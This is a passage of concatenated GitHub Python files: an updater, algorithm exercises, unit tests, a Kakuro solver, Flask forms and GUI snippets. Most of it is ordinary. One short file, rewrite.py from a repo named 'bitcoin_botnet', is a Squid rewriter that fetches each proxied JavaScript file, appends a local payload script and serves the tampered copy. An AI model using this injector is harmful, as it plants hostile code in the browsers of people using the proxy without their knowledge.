os.path.basename(ctx)\n print ('\\t[>] Moving {} {}:'.format('HEADER' if is_header else 'LIBRARY', bn), flush=True, end=' ')\n shutil.move(ctx, os.path.join(local_include_dir_path if is_header else local_lib_dir_path, bn))\n print ('Done!') \n else:\n tokens = method.split(' ')\n src = tokens[1]\n dst = tokens[2]\n \n print ('\\t[>] Moving {} 
files from {}...'.format('HEADER' if is_header else 'LIBRARY', package['LIB']))\n\n try:\n dst = join_with_any(local_include_dir_path if is_header else local_lib_dir_path, tokens[2])\n except:\n print('\\t\\t[#] Could not locate DESTINATION in {} instruction'.format('HEADER' if is_header else 'LIBRARY'))\n error = True\n break\n\n print ('\\t\\t[>] DESTINATION found at {}'.format(dst))\n\n is_file = False\n file_basename = None\n if src.endswith('/*'):\n src = src[0:len(src) - 2]\n elif src.endswith('/'):\n src = src[0:len(src) - 1]\n else:\n is_file = True\n file_basename = os.path.basename(src)\n src = os.path.dirname(src)\n\n wd = None\n try:\n wd = join_with_any(ctx, src)\n except:\n print('\\t\\t[#] Could not locate SOURCE in {} instruction!'.format('HEADER' if is_header else 'LIBRARY'))\n error = True\n break\n\n print ('\\t\\t[>] SOURCE found at {}'.format(wd))\n\n if os.path.isdir(wd):\n units = [file_basename] if is_file else os.listdir(wd)\n\n for el in units:\n current = os.path.join(wd, el)\n\n link_names = []\n while (os.path.islink(current)):\n link_names.append(os.path.basename(current))\n current = os.readlink(current)\n current = os.path.join(wd, current)\n\n future = os.path.join(dst, os.path.basename(current))\n print ('\\t\\t[>] Moving {} to {}'.format(current, future))\n shutil.move(current, future)\n\n for ln in link_names:\n ln_path = os.path.join(dst, ln)\n f_name = os.path.basename(future)\n print ('\\t\\t[>] Creating symlink {} to {}'.format(ln, f_name))\n os.symlink(f_name, ln_path)\n\n print ('\\t[>] Done!')\n\n elif method.startswith('CMAKE') or method.startswith('MAKE'):\n params = method.split(' ')\n params[0] = params[0].lower()\n\n print ('\\t[>] Building using {}...'.format(params[0]))\n\n cmd = ' '.join(params)\n\n cwd = os.getcwd()\n\n wd = join_with_any(cwd, ctx)\n\n print ('\\t\\t[>] Changing working directory to {}:'.format(wd), flush=True, end=' ')\n os.chdir(wd)\n print ('Done!')\n\n print ('\\t\\t[>] Running command \"{}\": '.format(cmd), flush=True, end=' ')\n p = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n print ('Done!')\n\n print ('\\t\\t[>] Changing working directory to {}:'.format(cwd), flush=True, end=' ')\n os.chdir(cwd)\n print ('Done!')\n\n if p.returncode != 0:\n print ('\\t\\t[#] Failure')\n\n out = p.stdout.decode('utf-8')\n err = p.stderr.decode('utf-8')\n print ('\\t\\t[#] Output:\\n{}'.format(out))\n print ('\\t\\t[#] Error:\\n{}'.format(err))\n error = True\n else:\n print('\\t[>] Done!')\n\n else:\n print ('\\t[#] Unknown method {}'.format(method))\n error = True\n\n if error:\n print ('[\\033[91mFAIL\\033[0m] {} was not installed.'.format(package['LIB']))\n break\n else:\n print ('[\\033[92mOK\\033[0m] {} installed successfully.'.format(package['LIB']))\n total_count += 1\n\n # Cleaning up cache\n print ('[>] Cleaning up...', flush=True, end=' ')\n time.sleep(3) \n shutil.rmtree(cache_dir_location)\n print ('Done!')\n f.close()\n\n if total_count < len(packages):\n print ('[\\033[91mFAIL\\033[0m] Updater failed after {}/{} packages.'.format(total_count, len(packages)))\n return 1\n\n print ('[\\033[92mOK\\033[0m] Updater installed {}/{} packages.'.format(total_count, len(packages)))\n return 0\n","repo_name":"valentindeaconu/vd_game_engine","sub_path":"meta/update_manager.py","file_name":"update_manager.py","file_ext":"py","file_size_in_byte":10871,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"8641935243","text":"def 
balancedSum(n,arr):\n rSum = 0\n lSum = 0\n for item in arr:\n rSum += item\n \n for i in range(0,n):\n rSum -= arr[i]\n if(rSum == lSum):\n return 'YES'\n lSum += arr[i]\n return 'NO'\n \n\n\nT = int(input())\nfor i in range(0,T):\n n = int(input()) \n arr = list(map(int,str.strip(input()).split(' ')))\n print(balancedSum(n,arr))\n\n","repo_name":"kshtj24/HackerRank","sub_path":"Algorithms/Searching/Sherlock and Array.py","file_name":"Sherlock and Array.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18210292236","text":"# --- coding: utf-8 ---\n\nfrom unittest import TestCase\nfrom tree.binary_search_tree import binary_search_tree_check, levelOrderPrint, levelOrderPrint2, trimBST\nfrom tree.binary_search_tree import Tree, Node\n\nclass TestTree(TestCase):\n\n def test_binary_search_check(self):\n a = Tree(1, 'a')\n b = Tree(2, 'b')\n c = Tree(3, 'c')\n d = Tree(4, 'd')\n e = Tree(5, 'e')\n d.left = b\n b.left = a\n b.right = c\n d.left = e\n\n self.assertTrue(binary_search_tree_check(a))\n\n\n x = Tree(1, 'x')\n y = Tree(2, 'y')\n z = Tree(3, 'z')\n y.left = z\n y.right = x\n\n self.assertFalse(binary_search_tree_check(y))\n\n root= Tree(10, \"Hello\")\n root.left = Tree(5, \"Five\")\n root.right= Tree(30, \"Thirty\")\n self.assertTrue(binary_search_tree_check(root))\n\n root = Tree(10, \"Ten\")\n root.right = Tree(20, \"Twenty\")\n root.left = Tree(5, \"Five\")\n root.left.right = Tree(15, \"Fifteen\")\n self.assertFalse(binary_search_tree_check(root))\n\n def test_level_order_print(self):\n a = Node(1)\n b = Node(2)\n c = Node(3)\n d = Node(4)\n e = Node(5)\n f = Node(6)\n d.left = b\n b.left = a\n b.right = c\n d.right = e\n e.right = f\n\n assert_str = '4 \\n' + '2 5 \\n' + '1 3 6 \\n'\n\n self.assertEqual(levelOrderPrint(d), assert_str)\n self.assertEqual(levelOrderPrint2(d), assert_str)\n\n def test_trimBST(self):\n a = Node(1)\n b = Node(2)\n c = Node(3)\n d = Node(4)\n e = Node(5)\n f = Node(6)\n d.left = b\n b.left = a\n b.right = c\n d.right = e\n e.right = f\n\n g = trimBST(d, 2, 5)\n self.assertEqual(g.val, 4)\n self.assertEqual(g.left.val, 2)\n self.assertEqual(g.left.right.val, 3)\n self.assertEqual(g.left.left, None)\n self.assertEqual(g.right.val, 5)\n self.assertEqual(g.right.right, None)\n\n a = Node(8)\n b = Node(3)\n c = Node(1)\n d = Node(6)\n e = Node(4)\n f = Node(7)\n g = Node(10)\n h = Node(14)\n i = Node(13)\n\n a.left = b\n a.right = g\n b.left = c\n b.right = d\n d.left = e\n d.right = f\n g.right = h\n h.left = i\n\n j = trimBST(a, 5, 13)\n self.assertEqual(j.val, 8)\n self.assertEqual(j.left.val, 6)\n self.assertEqual(j.left.right.val, 7)\n self.assertEqual(j.left.left, None)\n self.assertEqual(j.right.val, 10)\n self.assertEqual(j.right.right.val, 13)\n self.assertEqual(j.right.right.left, None)\n","repo_name":"tmatsuba/python_datastructure_algorithm","sub_path":"tests/test_tree.py","file_name":"test_tree.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"17107480849","text":"#!/usr/bin/python\n\nimport sys\nimport os\nimport re\nfrom urllib import *\ncount = 0\n\ndef modify_url(line):\n list = line.split(' ')\n old_url = list[0]\n new_url = old_url\n pid = os.getpid()\n global count\n match = re.match('http://.*\\.js', old_url)\n if match:\n os.system('wget -q -O /var/www/html/' + str(pid) + '-' + str(count) + '.js ' + old_url)\n os.system('cat 
/etc/squid/payload.js >> /var/www/html/' + str(pid) + '-' + str(count) + '.js')\n os.system('chmod o+r /var/www/html/' + str(pid) + '-' + str(count) + '.js')\n new_url = 'http://127.0.0.1:80/' + str(pid) + '-' + str(count) + '.js'\n count += 1\n return new_url + '\\n'\n\ncount = 0\nwhile(True):\n line = sys.stdin.readline().strip()\n new_url = modify_url(line)\n sys.stdout.write(new_url)\n sys.stdout.flush()\n\n","repo_name":"4m1g0/bitcoin_botnet","sub_path":"rewrite.py","file_name":"rewrite.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"13537224076","text":"import sys\nfrom PyQt4 import QtGui\n\nprint(\"entered function\")\napp = QtGui.QApplication(sys.argv)\nprint(\"app created\")\nw = QtGui.QWidget()\nprint(\"widget created\")\nb = QtGui.QLabel(w)\nb.setText(\"Hello World!\")\nw.setGeometry(100,100,200,50)\nb.move(50,20)\nw.setWindowTitle(\"PyQt\")\nw.show()\nsys.exit(app.exec_())\n","repo_name":"GayathryS/pyqt","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24384842912","text":"'''\r\nFor loop for printing natural numbers and its sum upto 'n'\r\n\r\n'''\r\nnum = int(input(\"Enter a number: \"))\r\nsum = 0\r\n# range(start_from, end_comes_before, incremented_by (default is 1))\r\nfor i in range(1, num+1):\r\n print(i, end=\" \")\r\n sum = sum + i\r\nprint(\"\\nThe sum is :\", sum)\r\n\r\nprint(\"\\n\")\r\n\r\nfruits = ['apple', 'berry', 'cherry']\r\nfor item in fruits:\r\n print(item)\r\n \r\nprint(\"\\n\")\r\n\r\n# looping through string\r\nfor c in \"ABCDEFGHIJKLMOPQRSTUVWXYZ\":\r\n print(f\"{c} \", end=\"\")\r\n \r\nprint(\"\\n\")\r\n# break statements\r\nfor c in fruits:\r\n if c == \"cherry\":\r\n break\r\n print(c)\r\n \r\n# for loops cannot be empty,\r\n# \"IndentationError: expected an indented block after 'for' statement on line\", the error\r\nfor x in fruits:\r\n pass\r\n","repo_name":"BANZOM/PP-Python-Practice","sub_path":"forLoop.py","file_name":"forLoop.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13494477288","text":"import heapq\n\n\nclass Kakuro:\n def __init__(self, row, col):\n self.row = row\n self.col = col\n self.board = []\n self.arrOfValueNodes = []\n self.copyOfArrOfValueNodes = []\n\n # full the arr of nodes to have all value nodes in one arr.\n def set_arr_of_value_nodes(self):\n for i in range(0, self.row):\n for j in range(0, self.col):\n\n temp_node = self.board[i][j]\n if temp_node.name[0] == 'X':\n self.arrOfValueNodes.append(temp_node)\n\n def add_nodes_to_board(self, array_of_nodes):\n self.board.append(array_of_nodes)\n\n def print_board(self):\n text = \"\"\n for i in range(0, self.row):\n for j in range(0, self.col):\n # because B nodes has no number in their name\n if str(self.board[i][j]) == 'B':\n text += str(self.board[i][j]) + \" \" * 3\n else:\n text += str(self.board[i][j]) + \" \"\n text += '\\n'\n return text\n\n def solve(self):\n pass\n\n # find neighbors of each nodes and set row and col consistency to each value node.\n def find_neighbors(self):\n for i in range(0, self.row):\n for j in range(0, self.col):\n temp_arr = []\n temp_node = self.board[i][j]\n if temp_node.name[0] == 'X':\n # from where temp_node is to right.\n for k in range(j + 1, self.col):\n temp_node2 = 
self.board[i][k]\n if temp_node2.name[0] == 'X':\n if temp_node2.name != temp_node.name:\n temp_arr.append(temp_node2)\n else:\n break\n # from where temp_node is to left.\n for k in range(j, -1, -1):\n temp_node2 = self.board[i][k]\n if temp_node2.name[0] == 'X':\n if temp_node2.name != temp_node.name:\n temp_arr.append(temp_node2)\n else:\n if temp_node2.name[0] == 'C':\n temp_node.set_row_constraint(temp_node2.rowC)\n break\n temp_node.add_horizontal_neighbors(temp_arr)\n temp_arr = []\n # from where temp_node is to down.\n for k in range(i + 1, self.row):\n temp_node2 = self.board[k][j]\n if temp_node2.name[0] == 'X':\n if temp_node2.name != temp_node.name:\n temp_arr.append(temp_node2)\n else:\n break\n # from where temp_node is to up.\n for k in range(i - 1, -1, -1):\n temp_node2 = self.board[k][j]\n if temp_node2.name[0] == 'X':\n if temp_node2.name != temp_node.name:\n temp_arr.append(temp_node2)\n else:\n if temp_node2.name[0] == 'C':\n temp_node.set_col_constraint(temp_node2.colC)\n break\n temp_node.add_vertical_neighbors(temp_arr)\n\n # # set domain to each node that are have consistency less than 9\n # def set_domain_to_each_node(\n # self): # TODO check the neighbors and then set domain depend on the count of neighbors.\n # for i in range(0, self.row):\n # for j in range(0, self.col):\n # temp_arr = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n # temp_node = self.board[i][j]\n # if temp_node.name[0] == 'X':\n # if temp_node.rowC > 9 and temp_node.colC > 9:\n # temp_node.set_domain(temp_arr)\n #\n # elif temp_node.rowC < 9:\n # temp_arr = [x for x in temp_arr if x <= temp_node.rowC - 1] # TODO check the neighbors>=1.\n # temp_node.set_domain(temp_arr)\n #\n # elif temp_node.colC < 9:\n # temp_arr = [x for x in temp_arr if x <= temp_node.colC - 1] # TODO check the neighbors>=1.\n # temp_node.set_domain(temp_arr)\n #\n # # print(temp_node.domain)\n\n # calculate the domain of nodes that has no value depend on their neighbors\n def calculate_domain(self):\n for i in range(0, self.row):\n for j in range(0, self.col):\n temp_arr = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n temp_node = self.board[i][j]\n if temp_node.name[0] == 'X' and temp_node.value is None:\n number_of_neighbors = 1\n # print(temp_node.horizontalNeighbors)\n for k in range(0, len(temp_node.horizontalNeighbors)):\n if temp_node.horizontalNeighbors[k].value is None:\n number_of_neighbors += 1\n # print(temp_node.rowC)\n max_value = int(temp_node.rowC - ((number_of_neighbors * (number_of_neighbors - 1)) / 2))\n min_value = int(temp_node.rowC - ((20 - number_of_neighbors) * (number_of_neighbors - 1)) / 2)\n # print(f\"{temp_node} max Value {max_value} min Value {min_value}\")\n # print(number_of_neighbors)\n temp_arr = [x for x in temp_arr if x >= min_value]\n temp_arr = [x for x in temp_arr if x <= max_value]\n # print(temp_arr)\n temp_node.set_domain(temp_arr)\n\n number_of_neighbors = 1\n # print(temp_node.verticalNeighbors)\n for k in range(0, len(temp_node.verticalNeighbors)):\n if temp_node.verticalNeighbors[k].value is None:\n number_of_neighbors += 1\n max_value = int(temp_node.colC - ((number_of_neighbors * (number_of_neighbors - 1)) / 2))\n min_value = int(temp_node.colC - ((20 - number_of_neighbors) * (number_of_neighbors - 1)) / 2)\n temp_arr = [x for x in temp_arr if x >= min_value]\n temp_arr = [x for x in temp_arr if x <= max_value]\n # print(temp_arr)\n # print(f\"{temp_node} max Value {max_value} min Value {min_value}\")\n if temp_node.domain != temp_arr:\n if len(temp_arr) < len(temp_node.domain):\n 
temp_node.set_domain(temp_arr)\n                # print(temp_node.domain)\n\n    @staticmethod\n    # goal check: returns True when every value node has been assigned a value.\n    def check_goal(row, col, board):\n        i = 0\n        check_node = False\n        while i < row:\n            j = 0\n            while j < col:\n                temp_node = board[i][j]\n                if temp_node.name[0] == 'X' and temp_node.value is None:\n                    check_node = True\n                    break\n                else:\n                    j += 1\n            if check_node:\n                break\n            else:\n                i += 1\n\n        if check_node:\n            return False\n        else:\n            return True\n\n    def set_copy_of_domain_each_node(self):\n        for node in self.arrOfValueNodes:\n            node.set_copy_of_domain()\n\n    def set_copy_of_value_nodes(self):\n        self.copyOfArrOfValueNodes = self.arrOfValueNodes.copy()\n\n    @staticmethod\n    def add_none_value_nodes(first_arr, second_arr):\n        for x in first_arr:\n            if x.value is None:\n                if x not in second_arr:\n                    second_arr.append(x)\n            elif x.value is not None:\n                if x in second_arr:\n                    second_arr.remove(x)\n\n    # this search keeps unassigned nodes in a priority queue, acting like the MRV and degree heuristics\n    def backtrack_search_use_queue(self):\n        Kakuro.add_none_value_nodes(self.arrOfValueNodes, self.copyOfArrOfValueNodes)\n        heapq.heapify(self.copyOfArrOfValueNodes)\n        if len(self.copyOfArrOfValueNodes) > 0 and not Kakuro.check_goal(self.row, self.col, self.board):\n            node = heapq.heappop(self.copyOfArrOfValueNodes)\n            Kakuro.least_constraining_value(node)\n            if node.value is None:\n                i = 0\n                # a while loop is used here because the domain list mutates during iteration, which breaks a for loop\n                while i < len(node.copyOfDomain):\n                    node.value = node.copyOfDomain[i]\n                    node.copyOfDomain.remove(node.value)\n                    # print(Kakuro.print_board_value(self.row, self.col, self.board))\n                    print(f\"{node}: {node.value}-----> {node.copyOfDomain}\")\n                    if Kakuro.valid_value(node):\n                        if Kakuro.forward_checking(node):\n                            Kakuro.add_none_value_nodes(self.arrOfValueNodes, self.copyOfArrOfValueNodes)\n                            heapq.heapify(self.copyOfArrOfValueNodes)\n                            if self.backtrack_search_use_queue():\n                                return True\n\n                    Kakuro.rec_forward_checking(node)\n                    node.copyOfDomain.append(node.value)\n                    node.copyOfDomain.sort()\n                    node.copyOfDomain = list(dict.fromkeys(node.copyOfDomain))\n                    # print (f\"{node}----------->copy of domain before lcv{node.copyOfDomain}\")\n                    Kakuro.least_constraining_value(node)\n                    node.value = None\n                    # print(Kakuro.print_board_value(self.row, self.col, self.board))\n                    i += 1\n            # ------------------------------------------------------------------------------------------------------\n            # original for-loop version, replaced by the while loop above\n            # for domain in node.copyOfDomain:\n            #     node.value = domain\n            #     node.copyOfDomain.remove(node.value)\n            #     print(Kakuro.print_board_value(self.row, self.col, self.board))\n            #     print(f\"{node}: {node.value}-----> {node.copyOfDomain}\")\n            #     if Kakuro.valid_value(node):\n            #         if Kakuro.forward_checking(node):\n            #             Kakuro.add_none_value_nodes(self.arrOfValueNodes, self.copyOfArrOfValueNodes)\n            #             heapq.heapify(self.copyOfArrOfValueNodes)\n            #             if self.backtrack_search_use_queue():\n            #                 return True\n            #\n            #         Kakuro.rec_forward_checking(node)\n            #         node.copyOfDomain.append(node.value)\n            #         node.copyOfDomain.sort()\n            #         node.copyOfDomain = list(dict.fromkeys(node.copyOfDomain))\n            #         # print (f\"{node}----------->copy of domain before lcv{node.copyOfDomain}\")\n            #         Kakuro.least_constraining_value(node)\n            #         node.value = None\n            #         print(Kakuro.print_board_value(self.row, self.col, self.board))\n            # ------------------------------------------------------------------------------------------------------\n\n        else:\n            print(\"*\" * 64 + '\n')\n            print(Kakuro.print_board_value(self.row, self.col, self.board))\n            print(\"*\" * 64)\n            
exit()\n\n def backtrack_search(self, number_in_arr_of_value):\n # we use not check_goal because we need it to be true when it is false.\n if number_in_arr_of_value < len(self.arrOfValueNodes) and not Kakuro.check_goal(self.row, self.col, self.board):\n node = self.arrOfValueNodes[number_in_arr_of_value]\n if node.value is None:\n for domain in self.lcv(node):\n node.value = domain\n # node.copyOfDomain.remove(node.value)\n print(f\"{node}: {node.value}-----> {node.copyOfDomain}\")\n # print(Kakuro.print_board_value(self.row, self.col, self.board))\n if Kakuro.valid_value(node):\n if Kakuro.forward_checking(node):\n if self.backtrack_search(number_in_arr_of_value + 1):\n return True\n self.rec_forward_checking(node)\n\n\n\n # Kakuro.rec_forward_checking(node)\n # node.copyOfDomain.append(node.value)\n # node.copyOfDomain = list(dict.fromkeys(node.copyOfDomain))\n # node.copyOfDomain.sort()\n node.value = None\n else:\n print(\"*\" * 64 + '\\n')\n print(Kakuro.print_board_value(self.row, self.col, self.board))\n print(\"*\" * 64)\n exit()\n\n @staticmethod\n def forward_checking(node):\n for x in node.verticalNeighbors:\n if node.value in x.copyOfDomain:\n x.copyOfDomain.remove(node.value)\n if len(x.copyOfDomain) <= 0 and x.value is None:\n return False\n for x in node.horizontalNeighbors:\n if node.value in x.copyOfDomain:\n x.copyOfDomain.remove(node.value)\n if len(x.copyOfDomain) <= 0 and x.value is None:\n return False\n return True\n\n @staticmethod\n def rec_forward_checking(node):\n for x in node.verticalNeighbors:\n if node.value in x.domain:\n x.copyOfDomain.append(node.value)\n x.copyOfDomain = list(dict.fromkeys(x.copyOfDomain))\n x.copyOfDomain.sort()\n for x in node.horizontalNeighbors:\n if node.value in x.domain:\n x.copyOfDomain.append(node.value)\n x.copyOfDomain = list(dict.fromkeys(x.copyOfDomain))\n x.copyOfDomain.sort()\n\n @staticmethod\n def valid_value(node):\n sum_vertical = node.value\n sum_horizontal = node.value\n count_h = 0\n count_v = 0\n for x in node.verticalNeighbors:\n if x.value is not None:\n if x.value == node.value:\n return False\n count_v += 1\n sum_vertical += x.value\n for x in node.horizontalNeighbors:\n if x.value is not None:\n if x.value == node.value:\n return False\n count_h += 1\n sum_horizontal += x.value\n\n if sum_horizontal > node.rowC:\n return False\n elif sum_vertical > node.colC:\n return False\n elif count_v == len(node.verticalNeighbors) and sum_vertical != node.colC:\n return False\n elif count_h == len(node.horizontalNeighbors) and sum_horizontal != node.rowC:\n return False\n else:\n return True\n\n @staticmethod\n def print_board_value(row, col, board):\n text = \"\"\n for i in range(0, row):\n for j in range(0, col):\n # because B nodes has no number in their name\n if board[i][j].value is None and board[i][j].type == 'value':\n text += '0 '\n elif board[i][j].type == 'constraint':\n if board[i][j].rowC is not None:\n text += str(board[i][j].rowC) + \" \"\n elif board[i][j].colC is not None:\n text += str(board[i][j].colC) + \" \"\n elif board[i][j].type == 'blank':\n text += '-1 '\n\n else:\n text += str(board[i][j].value) + \" \"\n text += '\\n'\n return text\n\n @staticmethod\n # LCV heuristic\n def least_constraining_value(node):\n arr = node.copyOfDomain\n neighbors = node.verticalNeighbors.copy()\n neighbors += node.horizontalNeighbors.copy()\n new_arr = []\n count_of_each_domain = {}\n\n for n in arr:\n counter = 0\n for neighbor in neighbors:\n if n in neighbor.domain:\n counter += 1\n count_of_each_domain[n] = 
counter\n        # print(f'{node}--------------------------------------------->new arr{count_of_each_domain}')\n        result = sorted(count_of_each_domain, key=count_of_each_domain.get)\n        if len(result) != len(arr):  # TODO check and put the domain that doesn't in neighbours\n            print('---------------------------=========error=======================-----------------------------------')\n\n        # for n in arr:\n        #     for neighbor in neighbors:\n        #         if n not in neighbor.domain and n not in new_arr:\n        #             new_arr.append(n)\n        # for n in arr:\n        #     if n not in new_arr:\n        #         new_arr.append(n)\n        #\n\n        # print(f'{node}--------------------------------------------->new arr{result}')\n        node.copyOfDomain = result\n\n    @staticmethod\n    # MRV heuristic (NOT USED)\n    def minimum_remaining_values(arr_of_nodes):\n        heapq.heapify(arr_of_nodes)\n        # arr_of_nodes.sort(key=lambda x: len(x.domain))\n        # print(arr_of_nodes)\n\n    def arc_consistency(self):\n        queue = {(node, node2) for node in self.arrOfValueNodes for node2 in node.horizontalNeighbors}\n        temp_queue = {(node, node2) for node in self.arrOfValueNodes for node2 in node.verticalNeighbors}\n        queue.update(temp_queue)\n        # for node in self.arrOfValueNodes:\n        #     for neighbour in node.horizontalNeighbors:\n        #         temp = (node, neighbour)\n        #         queue.add(tuple(temp))\n        #     for neighbour in node.verticalNeighbors:\n        #         temp = (node, neighbour)\n        #         queue.add(tuple(temp))\n        while len(queue) != 0:\n            node1, node2 = queue.pop()\n            if Kakuro.remove_in_consistent_values(self.board, node1, node2):\n                if len(node1.copyOfDomain) == 0:\n                    return False\n                for neighbour in node1.horizontalNeighbors:\n                    if neighbour.name != node2.name:\n                        queue.add((neighbour, node1))\n        return True\n\n    @staticmethod\n    def remove_in_consistent_values(board, first_node, second_node):\n        remove = False\n        # iterate over a copy: removing from the list while iterating it would skip values\n        for domain in list(first_node.copyOfDomain):\n            check = True\n            for domain2 in second_node.copyOfDomain:\n                if Kakuro.check_conflict(board, first_node, domain, second_node, domain2):\n                    check = False\n                if not check:\n                    break\n            if check:\n                first_node.copyOfDomain.remove(domain)\n                remove = True\n        return remove\n\n    @staticmethod\n    def check_conflict(board, node1, domain1, node2, domain2):\n        sum_consistency = -1\n        if domain2 == domain1:\n            return False\n        if node1.rowIndex == node2.rowIndex:\n            row = board[node1.rowIndex]\n            sum_consistency = -1\n            for node in row:\n                if node.type == 'C':\n                    sum_consistency = node.rowC\n                    break\n        elif node1.colIndex == node2.colIndex:\n            list_of_col_nodes = []\n            for row in board:\n                list_of_col_nodes.append(row[node1.colIndex])\n            sum_consistency = -1\n            for node in list_of_col_nodes:\n                if node.type == 'C':\n                    sum_consistency = node.rowC\n                    break\n        if sum_consistency == -1:\n            return True\n        if sum_consistency < (domain1 + domain2):\n            return True\n        else:\n            return False\n\n    def lcv(self, node):\n        domain_conflict = []\n        for domain in node.copyOfDomain:\n            sum = 0\n            for neighbor in node.horizontalNeighbors:\n                if domain in neighbor.copyOfDomain:\n                    sum += 1\n            for neighbor in node.verticalNeighbors:\n                if domain in neighbor.copyOfDomain:\n                    sum += 1\n            domain_conflict.append((domain, sum))\n        domain_conflict.sort(key=lambda dc: dc[1])\n        # return the values ordered least-constraining first (the sorted list was previously computed but ignored)\n        return [dc[0] for dc in domain_conflict]","repo_name":"pouriyabp/kakuro-CSP-solver","sub_path":"Kakuro.py","file_name":"Kakuro.py","file_ext":"py","file_size_in_byte":20423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"14753846517","text":"#######################################################################################################################################\n# Project Euler Problem 30 Solution -- Digit Fifth Powers\n# By Mike Kane\n#\n#\n#Surprisingly there are only three numbers that can be written as the sum of fourth powers of their digits:\n#\n#1634 = 1^4 + 6^4 + 3^4 + 4^4\n#8208 = 8^4 + 2^4 + 0^4 + 8^4\n#9474 = 9^4 + 4^4 + 7^4 + 4^4\n#As 1 = 1^4 is not a sum it is not included.\n#\n#The sum of these numbers is 1634 + 8208 + 9474 = 19316.\n#\n#Find the sum of all the numbers that can be written as the sum of fifth powers of their digits.\n#\n#######################################################################################################################################\n\ndef checkSum(number):\n    answer = 0\n    strNumber = str(number)\n    for char in strNumber:\n        answer += int(char)**5\n    if answer == number:\n        return True\n    else:\n        return False\n\ndef getAnswer():\n    totalSum = 0\n    for x in range(2, 355000):\n        if checkSum(x):\n            totalSum += x\n    return totalSum","repo_name":"richglezriv/rdlms","sub_path":"euler_solution_30.py","file_name":"euler_solution_30.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"860887066","text":"#!/usr/bin/env python\n# coding: utf-8\n\n__author__ = 'yueyt'\n\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, BooleanField, SelectField, TextAreaField, PasswordField, \\\n    SelectMultipleField\nfrom wtforms import ValidationError\nfrom wtforms.validators import ip_address\n\nfrom webapp.models.server import Envinfo, Server\nfrom webapp.models.user import Subproject\n\nMACHINE_TYPE_LIST = [\n    ('SUSE SLES11 SP2', 'SUSE SLES11 SP2'),\n    ('SUSE SLES11 SP3', 'SUSE SLES11 SP3'),\n    ('SUSE SLES11 SP4', 'SUSE SLES11 SP4'),\n    ('AIX 7100', 'AIX 7100'),\n    ('AIX 5100', 'AIX 5100'),\n    ('AIX 6100', 'AIX 6100')\n]\n\n\nclass ServerForm(FlaskForm):\n    ip = StringField('ip:', validators=[ip_address()], render_kw={'placeholder': 'ip: XXX.XXX.XXX.XXX'})\n    subproject_id = SelectMultipleField('所属项目:', coerce=int)\n    oslevel = SelectField('操作系统版本:')\n    use = TextAreaField('用途:', render_kw={'placeholder': '填写该机器主要做什么用?MB应用/MQ网关。。。'})\n    owner = StringField('联系人:', render_kw={'placeholder': '填写机器的申请人'})\n    envinfo_id = SelectField('环境:', coerce=int)\n    status = BooleanField('使用中', default=True)\n    submit = SubmitField('保存')\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n        self.subproject_id.choices = [(a.id, ' '.join([a.name, a.name_en])) for a in Subproject.query.order_by('id')]\n        self.oslevel.choices = MACHINE_TYPE_LIST\n        self.oslevel.coerce = str\n        self.envinfo_id.choices = [(a.id, ' '.join([a.location, a.envname])) for a in Envinfo.query.order_by('id')]\n\n    def validate_ip(self, field):\n        if Server.query.filter_by(ip=field.data).first():\n            raise ValidationError('该ip已经登记过!')\n\n\nclass EditServerForm(FlaskForm):\n    ip = StringField('ip:', render_kw={'readonly': 'readonly'})\n    subproject_id = SelectMultipleField('所属项目:', coerce=int)\n    oslevel = SelectField('操作系统版本:')\n    use = TextAreaField('用途:', render_kw={'placeholder': '填写该机器主要做什么用?MB应用/MQ网关。。。'})\n    owner = StringField('联系人:', render_kw={'placeholder': '填写机器的申请人'})\n    envinfo_id = SelectField('环境:', coerce=int)\n    status = BooleanField('使用中', default=True)\n    submit = SubmitField('保存')\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        
self.subproject_id.choices = [(a.id, ' '.join([a.name, a.name_en])) for a in Subproject.query.order_by('id')]\n self.oslevel.choices = MACHINE_TYPE_LIST\n self.oslevel.coerce = str\n self.envinfo_id.choices = [(a.id, ' '.join([a.location, a.envname])) for a in Envinfo.query.order_by('id')]\n\n\nclass ServerUserForm(FlaskForm):\n username = StringField('用户名')\n password = PasswordField('密码')\n submit_add = SubmitField('保存密码')\n submit_delete = SubmitField('删除密码')\n","repo_name":"yyt030/servermanager","sub_path":"webapp/forms/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"39607068714","text":"import sys\nimport time\nimport socket\nfrom device import Device\n\nfrom bmap import bmap\n\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.togglebutton import ToggleButton\nfrom kivy.uix.boxlayout import BoxLayout\n\nclass RootWidget(BoxLayout):\n pass\n\nclass BoozeConnect(App):\n\n\n def setANR(self, widget):\n if widget.state == 'down':\n print(f'setting mode {widget.text}')\n self.bmap.settings.ANR.set(widget.text)\n self.root.ids['ANRMode'].text = widget.text\n\n def build(self):\n # Connect to device and load bmap classes\n self.dev = Device(sys.argv[1])\n self.bmap = bmap(self.dev.read, self.dev.write)\n self.dev.connect()\n\n # Load UI\n Builder.load_file('ui.kv')\n self.root = RootWidget()\n\n # Get 